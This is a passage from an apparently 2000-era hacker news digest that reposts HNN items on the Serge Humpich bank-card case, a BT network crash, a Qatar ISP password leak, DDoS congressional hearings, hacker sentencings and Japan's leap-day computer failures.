      conviction. In an open statement, eight French consumer associations 
      demanded that banks provide a full disclosure on credit card safety. The 
      affair could undermine Frances attempts at exporting this chip 
      technology, as well as the prospects of installing cheap card readers on 
      PCs as a mean of authenticating e-commerce transactions. 

      "You know, I didnt put them in the mess they're in today," Humpich says. 
      His lawyers plan to appeal the conviction.  
      
      
      French;
      
      Le justice ne fait pas crdit au pirate
      des cartes bancaires 
      Prison avec sursis et amende, alors qu'il plaidait la
      bonne foi. 

      Par PASCALE NIVELLE

      Le samedi 26 et dimanche 27 fvrier 2000 
      
         Le tribunal correctionnel de Paris a condamn vendredi Serge
         Humpich, pirate des cartes bancaires,  dix mois de prison
       avec sursis et  verser un franc symbolique au plaignant GIE-CB
       (Groupement d'intrt conomique cartes bancaires). Un jugement
       mi-chvre, mi-chou, plus clment que les rquisitions du ministre
       public (deux ans avec sursis et 50 000 francs d'amende), mais plus
       svre que ne l'esprait la dfense, qui avait plaid farouchement la
       relaxe, le 21 janvier devant la treizime chambre. Je ne comprends
       rien  la justice... C'est un jugement d'incitation  la fraude, a
       dclar l'ingnieur  la sortie de l'audience. 

       Un ssame. Car il n'a jamais eu l'intention de frauder. En 1997, cet
       ingnieur informaticien invente, aprs quatre ans de recherches dans la
       soupente de sa ferme de Seine-et-Marne, la formule dont rvent les
       hackers (pirates informatiques) du monde entier. Comment violer le
       systme de scurit des cartes bancaires: bricoler d'abord une fausse
       carte, lui attribuer un code illisible et voir afficher code bon dans
       tous les cas. Un ssame pour un crdit illimit dans les distributeurs de
       billets et les terminaux d'accs des 600 000 commerants franais
       adhrents du GIE-CB. 

       En juillet 1998, il dpose son invention  l'INPI (Institut national de
       la proprit industrielle) sous le label comment fabriquer une
       fausse Carte bleue et contacte le GIE par l'intermdiaire d'un
       avocat d'affaires et d'un conseil en proprit industrielle. Il compte
       monnayer sa trouvaille et conclure avec eux un contrat de
       transmission de savoir-faire. Le secret contre une forte somme
       d'argent, pratique courante dans le monde des affaires. Pour le GIE,
       connatre la faille de son systme de scurit, c'tait trouver une
       nouvelle parade contre la fraude, explique l'ingnieur. D'abord
       incrdule, le GIE le laisse venir et finit par accepter le march
       quand Serge Humpich, en prsence d'un huissier, retire dix
       carnets de tickets de mtro dans une station parisienne. 

       En fait, le GIE a dj port plainte. En aot 1998, Serge
       Humpich est fil, plac sur coute. En septembre, il est plac en
       garde  vue, mis en examen pour avoir frauduleusement accd au
       systme et licenci de son emploi pour faute grave. 

       500 francs par mois. Amer, il constate: Je pouvais gagner un peu
       d'argent honntement, beaucoup d'argent malhonntement. J'ai
       eu affaire  des bandits et j'ai tout perdu. Fin du rve. Il vit,
       depuis, avec 500 francs par mois aprs crdits et impts. 

       Au procs, le 21 janvier, l'avocat du GIE a rclam une peine
       exemplaire contre le petit bidouilleur pervers. Le ministre
       public, incluant Serge Humpich dans la techno-dlinquance, l'a
       accus d'avoir voulu servir ses intrts personnels par une espce
       de chantage, mais a rclam cependant une demi-mesure, rappelant
       que la peine maximale tait de sept ans pour ce type de dlit. 

       Le jugement de vendredi confirme la conviction mitige des magistrats
       dans ce dossier. 

       Choqu par l'enchanement des vnements, trs anxieux, Serge
       Humpich esprait la relaxe rclame par ses avocats au nom de
       l'honntet de leur client. Pouss  la faute, dit-il, par ceux-l
       mmes qui l'ont accus de fraude, cet Alsacien fils de mineur, diplm
       d'une cole d'ingnieur de Lyon, ne regrette rien malgr sa situation
       actuelle: J'ai beaucoup appris. Il reste aussi le seul dtenteur du
       secret des cartes bancaires. 
      
      @HWA
      
93.0  HNN:Feb 26th:BT Network Crashed, Reason Unknown 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/      
       
      contributed by knobcottage 
      
      All 0345, 0845, and 0800 numbers on the British Telecom network crashed
      from 11a.m. on February 26, until early hours of the next day, for
      'unknown reasons' say British Telecom.  0345, 0845 numbers are those
      designated as local call charge numbers and are those used by the
      service industries and most ISP's.  0800 numbers are free numbers used
      for promotions.  BT is still investigating the cause of the crash.
      
      The Guardian Observer
      http://www.newsunlimited.co.uk/Breaking_News/UK/0,2478,35055,00.html
      
      We Don't Know Cause Of
      Crash, Says Bt 

      From the Press Association       Saturday February 26, 2000 11:42 am

      BT has said it does not know what       caused the crash of part of its 
      national network - or if it could happen again. 

      Phone engineers worked through the night       to restore the operation of 
      0800, 0845 and 0345 numbers, which were blocked or engaged from yesterday 
      at 11am. 

      The fault hit calls to the Government's       flagship NHS helpline, two 
      motoring rescue organisations, gas companies, banks and rail inquiries. 

      "It is likely the problem was a malfunction       in the system than to do 
      with call volumes, but we do not know for absolute certain," a BT 
      spokesman said. 

      "There is an urgent need to establish what       happened. We have no 
      indication yet as to what caused this problem, where it started or if it 
      could happen again." 

      Among the worst-affected services were       the NHS Helpline, the AA, the 
      RAC, British gas, pipeline operator Transco, National Rail Inquiries, 
      banks, Virgin, the RSPCA, the Samaritans, and some Internet service 
      providers. 

      The problem began when two of the three       BT computers handling 
      reduced rate calls and freephone numbers crashed for an unknown reason, 
      triggering a massive logjam. 

      BT said that two main gateways to the       network, at Cambridge and 
      Leeds, were affected by the problems, leaving the remaining one in Croydon 
      swamped with calls. 

      The spokesman said: "We will be       monitoring the network closely as 
      call volumes increase and work will also continue both to establish the 
      root cause of the incident to ensure that this problem does not recur." 

      The Department of Health confirmed that       difficulties getting through 
      to the NHS Direct service were down to BT. The round-the-clock service 
      normally receives
      around 8,000 calls a day. 
      
      
      @HWA
      
94.0  HNN:Feb 26th:ISP Loses User Names And Passwords
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
       
      contributed by mothy 
      
      The only ISP in the small middle eastern country of Qatar had at least
      one third of its customer information released to CD and sold on the
      streets of the capital city of Ad Doha. The ISP, QTel, denied the
      allegations until the information was made public.
      
      Wired
      http://www.wired.com/news/politics/0,1283,34515,00.html
      
      Internet Scandal in Qatar 
      by Jihad Abdullah 
      
      3:00 a.m. 24.Feb.2000 PST 
      DUBAI, United Arab Emirates -- Thousands of Qataris have finally 
      discovered why their Internet access bills inexplicably soared like the 
      price of oil in recent weeks: Their usernames and passwords were being 
      sold on CDs. 

      More than 6,000 usernames and their relevant passwords were being sold in 
      the capital city of Ad Doha and other cities for between 500 and 1,000 
      Qatari riyals (US$137-275) over the past several weeks. 

      
      Many of the usernames and passwords apparently belonged to corporate 
      accounts of several ministries, major companies, and even the Emiri 
      (Royal) Court. 

      The affected accounts total about one-third of Internet users in Qatar, 
      according to a recent survey by Internet Al Alam Al Arabi magazine. 

      The culprit remains a mystery as finger-pointing runs rampant. 

      Qatar's only ISP, QTel, has admitted a leak, and said it averted 
      continuing problems by launching an email campaign asking subscribers to 
      change their passwords. 

      Qatar's former minister of justice, Najeeb Noaimi, claimed credit for 
      uncovering the scandal in his weekly column in Al Sharq Daily and on 
      national TV. But he said that was only after he was rebuffed in his 
      attempts to communicate the       problem with QTel. 

      "I gave a copy of the CD to QTel's GM, but nothing was done," Noaimi said. 
      "Then I warned them and they didn't respond. Now I have to go public and 
      tell the story."

      
      Noaimi blames QTel staff members for the security breach, and said the CD 
      focused on large corporations that might not notice discrepancies in their 
      bills. Typical Internet access charges in Qatar amount to the equivalent 
      of US$3 an hour. 

      Some corporations, including the Al Sharq newspaper, did notice the 
      difference. "We used to get a monthly bill of QR3,000 ($820). Suddenly in 
      December, we got a bill of QR15,000," said editor Abdulaziz Almahmoud. 

      "What was strange is that whenever we changed our password, we found it is 
      leaked the next morning." 

      Almahmoud's bill for January was more than QR170,000 ($46,500), which he 
      refused to pay. 

      Individual accounts also were affected. One Qatari reportedly received a 
      bill of QR60,000 (US$16,500) for service in January. 

      Qatari law mandates that the use of an unauthorized account to access the 
      Internet can be charged as a theft crime. 

      QTel, which is owned by the government as well as local and foreign 
      investors, issued a statement on Monday blaming Noaimi for the 
      distribution of the CD. 

      "He is involved in the leakage of this CD to hurt the reputation of QTel, 
      and we will consider a case against him," the statement said. 

      Noaimi said he welcomes such a case so he can expose the truth. He said he 
      was originally given a copy of the CD following a rash of complaints about 
      the sudden rise in access bills. 

      Amahmoud said that according to a threat he received, the newspaper risked 
      losing QTel ads if he published information about the leak. 

      QTel officials were told not to comment on the issue. "We were told not to 
      speak until this thing is over. If I talk to press, I may get fired," one 
      employee said. 
      
      @HWA
      
      
95.0  HNN:Feb 29th:Senate Hearings on DDoS Attacks Today
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
       
      contributed by Brian and Ted
      
      A hearing will be held today by a Joint Oversight Committee entitled
      "Internet Denial of Service Attacks and the Federal Response".  The
      hearing will be held today at 2:00pm in room 2141 of the Rayburn House
      Office Building. 
      
      Witness List
      - the last name on this list is rather interesting
      http://www.senate.gov/~judiciary/wl22920j.htm
      
      (Its "mudge" from the l0pht.. ;) -Ed )
      
      
      Industry Says No New Laws
      Today's Joint Oversight Hearing regarding the recent DDoS attacks are
      likely to result in industry leaders asking Congressional members not to
      pass more laws. Many industry leaders are more concerned about restoring
      online business quickly than enduring a protracted legal investigation.
      
      San Jose Mercury News
      http://www.sjmercury.com/svtech/news/breaking/ap/docs/260790l.htm
      
      Need for hacker laws downplayed
      BY TED BRIDIS AP Technology Writer 

      WASHINGTON (AP) -- Even amid dramatic attacks by cyber vandals on some of 
      the Internet's flagship Web sites, the nation's technology industry 
      appears reluctant to ask Congress for new or expanded anti-hacker 
      measures.

      The industry appears to be maintaining its traditional reluctance against 
      inviting government into its affairs, even in its defense against hackers 
      and online vandals.

      Those sentiments, expected to be delivered to lawmakers at a congressional 
      hearing Tuesday, illustrate the gulf between Washington and the high-tech 
      industry beyond the 2,400 miles physically separating the epicenters of 
      the two cultures.

      Panels from the House and Senate Judiciary committees organized Tuesday's 
      hearing to determine what changes, if any, they need to make to existing 
      crime laws in the wake of electronic attacks earlier in February that 
      disrupted for hours Web sites run by Yahoo!, Amazon.Com, eBay, ETrade and 
      others.

      But industry leaders, anxious about an expanded government presence, 
      appear uninterested. Companies are worried about bad publicity or poor 
      consumer confidence if they're identified in court as victims. Many are 
      more concerned about restoring online business quickly than enduring a 
      protracted legal investigation that results in the arrest, for example, of 
      a misguided college student.

      ``Infrastructure security ... does not lend itself to government 
      management,'' Microsoft's chief information security officer, Howard 
      Schmidt, said in remarks prepared for the hearing. ''... The private 
      sector has the knowledge and expertise to help fight against computer 
      crimes on the infrastructures on which they operate.''

      Schmidt warned lawmakers against ``unnecessary outside regulation or 
      interference in the operation of dynamic, very productive businesses.''

      The FBI still is trying to trace the origin of the assaults, which used 
      dozens of ``zombie'' computers nationwide where attack software had been 
      implanted and activated by hackers. The technique, called a ``denial of 
      service,'' is similar to programming fax machines to dial a company's 
      telephone number repeatedly to prevent other incoming calls.

      Rep. Bill McCollum, R-Fla., chairman of the House crime subcommittee, was 
      expected to poll federal authorities and technology executives whether 
      existing laws against hacking -- which typically prohibit breaking into 
      computers -- can be used to prosecute vandals in denial-of-service 
      attacks.

      In most of the recent attacks, the companies and their Internet providers 
      successfully filtered incoming ``junk'' data within hours to restore 
      service to their Web sites. Yahoo!, for example, indicated that financial 
      losses from the attack weren't serious.

      ``The technology industry showed that it can respond swiftly and 
      effectively, taking steps to quickly beat back the attacks to make it 
      harder for similar assaults to succeed in the future,'' Charles Giancarlo, 
      a senior vice president for Cisco Systems Inc., said in prepared 
      testimony.

      Cisco, which makes computer hardware used by many of the major sites, 
      helped stem the attack against the online auction site, eBay Inc.

      Giancarlo added: ``We do not ask Congress for new laws in the area of 
      Internet security.''

      An executive for Amazon.Com Inc., whose Web site fell under attack for 
      more than an hour late Feb. 8, did not identify in his testimony any new 
      laws the FBI might need, although the company said it supports better 
      training and more money for federal agents to become digital detectives.

      ``Current laws ... appear to provide some prosecutorial authority and have 
      been used successfully in several recent hacking cases,'' Paul Misener, 
      Amazon's vice president for global public policy, said.

      Congress has already offered to write new laws or change existing ones to 
      protect Internet companies. Sen. Kay Bailey Hutchison, R-Texas, has 
      promised new legislation to double the penalties for hackers to 10 years 
      in prison for a first offense and 20 years for a second offense.

      Sen. Patrick Leahy, D-Vt., wants to amend federal wiretap laws to make it 
      easier for authorities to trace vandals from the ``zombie'' computers 
      where they implant their attack software. Under current law, agents 
      require a wiretap order to examine data traffic flowing through those 
      computers, even with permission from the machine's owner.

      Others outside Congress are worried that lawmakers' eagerness to help 
      trace attacks against lucrative technology companies -- which are 
      gradually becoming powerful players in Washington -- could result in 
      draconian surveillance networks.

      ``It is clear that the private sector is stepping up its security efforts, 
      with an effectiveness that the government could never match,'' said James 
      X. Dempsey of the Center for Democracy and Technology. ''...
      The potential for the government to help is limited, while the risk of the government doing harm is very high.''
      
      
      @HWA
      
96.0  HNN:Feb 29th:NSA and CIA Form Third Secret Agency SCS
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/      
       
      contributed by Weld Pond 
      
      The French newspaper Le Monde has accused the CIA and NSA of creating a
      third super secret agency named Special Collection Service (SCS). The Le
      Monde claimed that this organization's role is to defeat various
      encryption technology to allow interception operations to succeed.
      
      Le Monde - French
      
      Cryptome - English Translation of Article
      
      
      
      @HWA
      
97.0  HNN:Feb 29th:Barr Responds To NSA
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
       
      contributed by Weld Pond 
      
      Last Sunday's episode of 60 Minutes featuring a spot concerning Echelon
      prompted the NSA to draft a letter to Congress in an attempt to Spin any
      possible negative coverage.  In response to that letter Representative
      Bob Barr from Georgia has drafted his own letter.
      
      Letter from NSA to Congress
      http://www.fas.org/sgp/news/2000/02/nsalet.html
      
      Letter from Barr to NSA
      http://cryptome.org/barr-nsa.htm
      
      @HWA
      
98.0  HNN:Feb 29th:Title Email Labeled as Internet Terrorism
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/      
       
      contributed by demetrius clinton 
      
      There is a rumor floating around the internet that Bananas from Costa
      Rica carry the "flesh-eating" bacteria called necrotizing fasciitis.
      While the email rumor is obviously not true it has prompted the Vice
      President of the International Banana Association (IBA) to label the
      action as "Internet Terrorism". (I think he should probably look up
      terrorism in the dictionary.)
      
      APB News
      http://www.apbnews.com/newscenter/internetcrime/2000/02/25/bananas0225_01.html
      
      
      Banana Rumor Called 'Internet
      Terrorism'
      E-mail Claims Fruit Spread Flesh-Eating Bacteria 
      
      Feb. 25, 2000 
      
      By David Noack 
      
      ALEXANDRIA, Va. (APBnews.com) -- The
      attack of the killer bananas? 
      
      A trade group says absolutely not and is
      trying to squelch an Internet rumor that has
      been circulating by e-mail claiming that
      bananas from Costa Rica carry the
      "flesh-eating" bacteria called necrotizing
      fasciitis. 
      
      International Banana Association (IBA) Vice President Tim Debus calls the
      rumor "just another case of Internet terrorism like the recent hacker attacks
      on popular Web sites." 
      
      The e-mail, which has been around since late January and is still
      circulating, purports to come from the Manheim Research Institute of the
      Center for Disease Control in Atlanta -- home of the real Centers for
      Disease Control and Prevention (CDC), the respected U.S. government
      agency. 
      
      'Urgent warning' 
      
      The "urgent warning" claims that necrotizing
      fasciitis has decimated the monkey population
      of Costa Rica and that researchers have
      recently discovered "the disease has been
      able to graft itself to the skin of fruits in the
      region, most notably the banana." Readers
      are warned that the infection can eat "2 to 3
      centimeters of flesh an hour" and that
      amputation is likely and death possible. 
      
      After warning readers to avoid buying bananas
      for two to three weeks and advising getting
      medical help immediately if they develop a
      fever, the message attempts to cash in on
      suspicion of government. 
      
      "The FDA [Food and Drug Administration] has
      been reluctant to issue a countrywide warning
      because of fear of nationwide panic," the
      message says. "They have secretly admitted
      that they feel upwards of 15,000 Americans
      will be affected by this but that these are
      acceptable numbers." 
      
      The allegations prompted the CDC to debunk
      the claim, advising that the bacteria usually associated with the disease
      "frequently live in the human body." 
      
      Concerns voiced to CDC 
      
      "The usual route of transmission for these bacteria is from person to
      person," the advisory says. "Sometimes, they can be transmitted in foods,
      but this would be an unlikely cause for necrotizing fasciitis. FDA and CDC
      agree that the bacteria cannot survive long on the surface of a banana." 
      
      A spokeswoman for the CDC said officials have received more than 100
      calls from people wanting to know the source of the claim and whether or
      not it's true. 
      
      The National Necrotizing Fasciitis Foundation, which researches the
      disease and offers support and education services, said the disease is not
      spread the way the hoax claims. 
      
      "The mere ingestion of these bacteria would only make you sick with
      vomiting or diarrhea, and I'm sure this has happened to many people
      already as part of normal human life," said Dr. John Shieh, a consulting
      physician in Los Angeles. "However, this will not cause you to get a
      necrotizing fasciitis. Don't worry about the bananas, anyway. Most of them
      you buy are from the USA." 
      
      Disrupting the economy? 
      
      Debus said the group has not contacted law enforcement and is just trying
      to get the word out that the allegations are false. 
      
      He said the hoax points up another way that cyber-pranksters can disrupt
      the economy. However, Debus said he has not seen any figures indicating
      a decline in banana sales. 
      
      Chiquita Brands International Inc., the banana producer, issued a
      statement denying the allegations. 
      
      "The report currently circulating on the Internet concerning Costa Rican
      bananas being contaminated with a rare bacteria is totally false," the
      company said. "Chiquita has received no reports of such contamination,
      and we have checked with the pertinent U.S. government agencies, which
      also confirm no reports of such contamination." 
      
      This is not the first Internet food hoax. 
      
      KFC targeted for fake chickens 
      
      Earlier this year, Kentucky Fried Chicken (KFC) was hit with the rumor that
      they do not use real chickens in their products, and to make the claim
      appear real, the allegation came from a study purportedly conducted by the
      University of New Hampshire. 
      
      KFC officials released a statement suggesting that the hoax was
      malicious. 
      
      "This Internet hoax is intended to destroy the trust that you have placed in
      KFC to provide high-quality chicken meals at all of our restaurants,"
      company officials said in a statement. "Although we hope that readers of
      the hoax will recognize it as obviously false, we take this or any other
      attack on the quality of KFC's product seriously." 
      
      Rose Miller, a computer security specialist with the Computer Incident
      Advisory Capability (CIAC), which is part of the federal Department of
      Energy, posts hoax information as a public service. 
      
      "We tell people how to do their own evaluations and don't believe everything
      you receive in an e-mail, on Web sites, because anybody can post
      anything," said Miller. 
      
      @HWA
      
99.0  HNN:Feb 29th:DDoS Commentary
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
       
      contributed by Unprivileged user 
      
      Do the recent denial of service attacks really count as cyber terrorism
      or is it more closely related to cyber vandalism? How much money was
      lost by the companies involved and is that really worth $37 Million of
      our hard earned tax dollars?
      
      Shift
      
      @HWA
      
100.0  HNN:Feb 29th:Two Sites in Singapore Compromised
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/      
       
      contributed by Apocalyse Dow 
      
      The computers of of Sparkmedia and a Pacific Internet in Singapore where
      broken into on September 3, 1999. The perpetrator, a 15-year-old
      student, will most likely receive a sentence of probation as opposed to
      jail time due to his age.
      
      The Straits Times
      http://www.straitstimes.asia1.com/singapore/sin7_0229.html
      (404)
      
      @HWA 
      
       
      
101.0  HNN:Feb 29th:Swedish Intruders Get Probation
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/      
       
      contributed by Alex 
      
      Two Swedish youths who had been accused of breaking into computers owned
      by NASA have received probationary sentences. One of the two intruders
      got additional sentencing for using stolen computer equipment and
      committing fraud, for using stolen Internet access accounts.
      
      Hemsidan - Swedish
      http://nyheter.idg.se/display.pl?ID=000229-CS5
      
      @HWA
      
102.0  HNN:Mar 1st:Still No Motive for DDoS Attacks
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/      
       
      contributed by turtlex 
      
      During testimony before the House and Senate Judiciary committees
      Micheal Vatis from NIPC has said that they still are unsure of a motive
      in the recent DDoS attacks. He went on to say that they are also unsure
      if the attacks where carried out by one person or several. According to
      Vatis the FBI is busy tracking down hundreds of which lead overseas,
      hampering the investigation.
      
      Associated Press - via Yahoo
      http://dailynews.yahoo.com/h/ap/20000229/tc/hacker_investigation_17.html
      
      Tuesday February 29 7:11 PM ET 
      FBI: Internet Attack Motive Unknown

      By TED BRIDIS AP Technology Writer 

      WASHINGTON (AP) - Senior law enforcement officials assured Congress on 
      Tuesday ``we are making progress'' despite serious challenges 
      investigating the sensational attacks weeks ago against some of the 
      Internet's most popular Web sites.

      Michael Vatis, head of the FBI's National Infrastructure Protection 
      Center, said federal agents are following ``hundreds of leads,'' and he 
      was optimistic the case will be solved. ``We continue to make good 
      progress,'' he said.

      But there were important questions that Vatis candidly said he couldn't 
      answer, suggesting no arrest was close. The FBI still has no idea of the 
      motive for the Internet attacks or whether one group or several groups 
      were responsible.

      ``I think it's too early to tell,'' Vatis told a joint congressional 
      panel. He said FBI agents were ``looking at possible linkages between all 
      the investigations,'' and responded to one lawmaker that it was unlikely 
      foreign governments were involved.

      Deputy U.S. Attorney General Eric Holder, who also testified, assured 
      lawmakers that ``we are making progress'' and repeated his earlier pledge 
      to ``prosecute these people to the fullest extent that we can.''

      Vatis acknowledged that investigators have been hampered because vandals 
      sought to cover their digital trail falsifying information within the 
      flood of data that overwhelmed Yahoo!, eBay and other major Internet sites 
      about three weeks ago. The FBI's own       Web site was overwhelmed for 
      about three hours in a similar attack on Feb. 18.

      The bureau is frustrated that some computers used in the attacks failed to 
      adequately record useful details, and some of the spurious data that 
      disrupted service at the Web sites apparently was routed through computers 
      overseas.

      ``Because parts of the evidentiary trail have led overseas, we are working 
      through our legal attaches in many U.S. embassies abroad to work with 
      foreign counterparts,'' Vatis said. ``Despite all these challenges, I 
      remain optimistic that the hard work of ... that       we will in the end 
      prove to be successful.''

      Panels from the House and Senate Judiciary committees organized the 
      hearing to determine what changes, if any, are needed to existing crime 
      laws.

      Holder and other federal authorities have urged Congress, for example, to 
      reduce the $5,000 minimum in damages that victim companies must suffer 
      before attackers can be prosecuted under federal computer crime laws.

      Holder called the $5,000 minimum ``a potential problem'' that might hamper 
      some prosecutions.

      Some lawmakers, though, indicated they were reluctant to grant sweeping 
      new authority to the federal government.

      ``Passing laws for the mere purpose of sending a message has not proven 
      effective,'' said Rep. Robert ``Bobby'' Scott, D-Va. He said he was 
      worried about consequences on Internet privacy and the technology 
      industry.

      Rep. Bob Barr, R-Ga., said the attacks in February against commercial 
      Web sites amounted to vandalism, not terrorism, and said he was doubtful
      they represented as serious a threat as biological or chemical attacks. 
      
      @HWA
      
      
103.0  HNN:Mar 1st:First Canadian Computer Crime Conviction
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/ 
      
       
      contributed by acoplayse 
      
      A Quebec court Tuesday convicted a 22-year-old man of electronically
      breaking into the computers of various government and corporate
      institutions. This is believed to be the first time a Canadian court
      has passed sentence in such a case. In a 12-page ruling, Quebec Court
      Justice Andre Bilodeau found Quebec City resident Pierre-Guy Lavoie
      guilty under Canada's criminal code of fraudulently using computer
      passwords to perpetrate computer crimes. He received a sentence of 12
      months of probation with community service.
      
      Reuters - via Yahoo
      http://dailynews.yahoo.com/h/nm/20000229/wr/canada_hacker_1.html
      
      Tuesday February 29 7:21 PM ET 

      Canada Court Convicts Hacker for the First Time

      By Patrick White

      QUEBEC CITY (Reuters) - A Quebec court on Tuesday convicted a 22-year-old 
      man of hacking the computers of government and corporate institutions -- 
      the first time a Canadian court has passed sentence in such a case.

      In a 12-page ruling, Quebec Court Justice Andre Bilodeau found Quebec City 
      resident Pierre-Guy Lavoie guilty under Canada's criminal code of 
      fraudulently using computer passwords to perpetrate computer crimes.

      ``The court cannot ignore the fact that the computer world which is poised 
      to face a dazzling expansion and will become, like other types of payment 
      or communications means invented by our societies, the theater of more and 
      more fertile criminal acts,'' the       judge wrote.

      Lavoie, a security consultant with the Quebec-based financial institution 
      Desjardins-Laurentian (Toronto:DJNa.TO - news), was sentenced to 12 months 
      of community service and placed on 12 months of probation.

      He was also ordered not to touch a computer or surf the Internet over the 
      next 12 months, except on the job and under surveillance.

      He was found guilty of hacking hundreds of passwords, access codes to 
      break into dozens of unauthorized government and corporate sites in 1998, 
      including the Canadian Department of National Defense, the U.S. military, 
      the Federal Bureau of Investigation       and companies such as Bell 
      Canada (Toronto:BCE.TO - news) and the National Bank of Canada 
      (Toronto:NA.TO - news).

      The hacker, and two friends who were discharged, listed the passwords and 
      access codes on a Web site they created called ''Corruption Addicts'' and 
      invited surfers around the world to penetrate computer systems and hack 
      away.

      ``I have learned a lesson,'' Lavoie told reporters at the Quebec City 
      courthouse.

      His lawyer, Claude Dallaire, said that there were no legal precedents for 
      this new form of cyber crime in Canada's history, noting that only a 
      handful of hackers had been arrested in Canada.

      Dallaire said the court's message was loud and clear.

      ``The message is clear. The judge tells everybody, 'Don't play with the 
      Internet, and don't go too far with the Internet, because you are going to 
      pass Go and go to jail,''' she said, referring the board game, Monopoly.

      ``It is a message that it is a crime, and they shouldn't do it, and they 
      will get punished for it,'' added Crown Prosecutor Pierre Lapointe.

      Lavoie was also convicted on Tuesday of planning to make explosives 
      substances over the World Wide Web, through another Internet site called 
      ``Phaust Laboratories''.

      For that he received a second 12-month community work sentence, to be 
      served concurrently with the first. 
      
      @HWA
      
      
104.0 HNN:Mar 1st:Major Systems Fail in Japan On Leap Day
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/      
       
      contributed by no0ne 
      
      Cash machines, weather and earthquake predictions system, and even a
      nuclear power plant had problems coping with the recent leap day. Mikio
      Aoki, chief government spokesman admitted  that the Japanese government
      has been careless in preparing for the leap year bug.
      
      BBC
      http://news.bbc.co.uk/hi/english/sci/tech/newsid_660000/660995.stm
      
      Other minor issues where reported at locations around the world.
      
      Nando Times
      http://www.nandotimes.com/technology/story/body/0,1634,500174980-500227322-501095064-0,00.html
      (404)
      
      
      BBC;
      
      Tuesday, 29 February, 2000, 14:40 GMT 
      Leap year computer bug bites

      Japan appears to have suffered alone so far Japan has been worst hit by 
      the Leap Year computer bug, a failure by computers to recognise the year 
      2000 as a leap year and add a day on 29 February. 

      Cash machines, weather and earthquake prediction systems, and a nuclear 
      plant were all affected and the government was forced to admit 
      embarrassing carelessness. 

      Chief government spokesman Mikio Aoki said the government had let down its 
      guard after the New Year, when the millennium bug caused a number of 
      problems. 

      "Because everything went well then, there is no denying we were negligent 
      this time," he said. 

      Elsewhere in the world, the problems were rare and minor. In New Zealand, 
      as many as 4,000 shops had trouble verifying banking transactions and in 
      Singapore the subway system rejected some travellers' cards this time," he 
      said. 

      No glitches have yet been reported from Europe or the Americas. Computers 
      in the US have did fail in leap years before. Four years ago, for 
      instance, Arizona Lottery players could not buy tickets when machines 
      failed. 

      To leap or not to leap

      The problem results from an exception to an exception in the rule 
      determining which years are leap years and therefore have an extra day, 29 
      February. 

      Generally, leap years occur every four years, when the year is wholly 
      divisible by four. However, years that are wholly divisible by 100 are not 
      leap years. The confusion has arisen because not all programmers were 
      aware that those years that are wholly divisible by 400 remain leap years, 
      meaning 2000 is in fact a leap year. 

      The failures in Japan, one of the world's most technologically-advanced 
      nations, are embarrassing. They follow high-profile space rocket failures, 
      last year's nuclear accident and hacker attacks on government computers,
      as well as difficulties with the millennium bug
      at the start of 2000. 
      
      @HWA
      
105.0 HNN:Mar 1st:HP's Cyber Insurance Takes a Hit
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/      
       
      contributed by acoplayse 
      
      Concerns are being raised that HP's new cyber intrusion insurance
      package does not go far enough. It is thought that putting a commercial
      value on damage caused by such intruders might escalate rather than
      contain the problem. An analyst with Strategy Partners said that HP's
      $2m worth of coverage offered for an annual premium of $57,000 was
      nowhere near enough, particularly for financial organizations. "Denial
      of service will cost them millions of dollars every minute that they
      are out of business," he warned. (Millions of dollars every minute?
      I would sure like to invest in any company making millions of dollars a
      minute.)
      
      Silicon.com
      http://www.silicon.com/public/door?REQUNIQ=951720818&6004REQEVENT=&REQINT1=36001&REQSTR1=newsnow
      
      
      @HWA
      
106.0 HNN:Mar 1st:Security Accountability is Still Low
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/      
       
      contributed by acoplayse 
      
      CIOs of new Internet startups and e-commerce companies are not being
      held accountable by stockholders or the venture capitalists when it
      comes to security. Stockholders of Internet companies should be asking
      who inside the company is responsible and is being held accountable for
      security. If the answer is no one then you can be assured that security
      will continue to be a low priority.
      Most executive management teams choose not to take enough measures to
      protect its customers and systems until after a security incident of
      considerable magnitude has taken place and tend to be reactive instead
      of proactive when it comes to security. (ECommerce companies tend to
      blame cyber intruders when the real culprit is a severe lack of
      security.)
      
      Technology Evaluation
      http://www.technologyevaluation.com/news_analysis/02-00/NA_ST_LPT_02_28_00_1.htm
      
      CIOs Need to Be Held Accountable for
      Security
      L. Taylor - February 28th, 2000
   
      Page 1 of 3
   
      Event Summary 
   
      While law enforcement agencies chase their tails in an
      international hacker hunt, hosting providers and
      eCommerce CIOs have surprisingly escaped the wrath of
      accountability. Stockholders of Internet companies
      should be asking who inside their investment holding is
      responsible and is being held accountable for security. If
      no one is held accountable, you can be assured that
      security will continue to be a low priority. 
   
      All too often in Internet companies, security is an
      afterthought. The executive management team chooses
      not to take enough measures to protect its customers
      and systems until after a security incident of
      considerable magnitude has taken place. This consistent
      pattern of locking the barn door after the horse has
      been stolen has been going on in Internet companies for
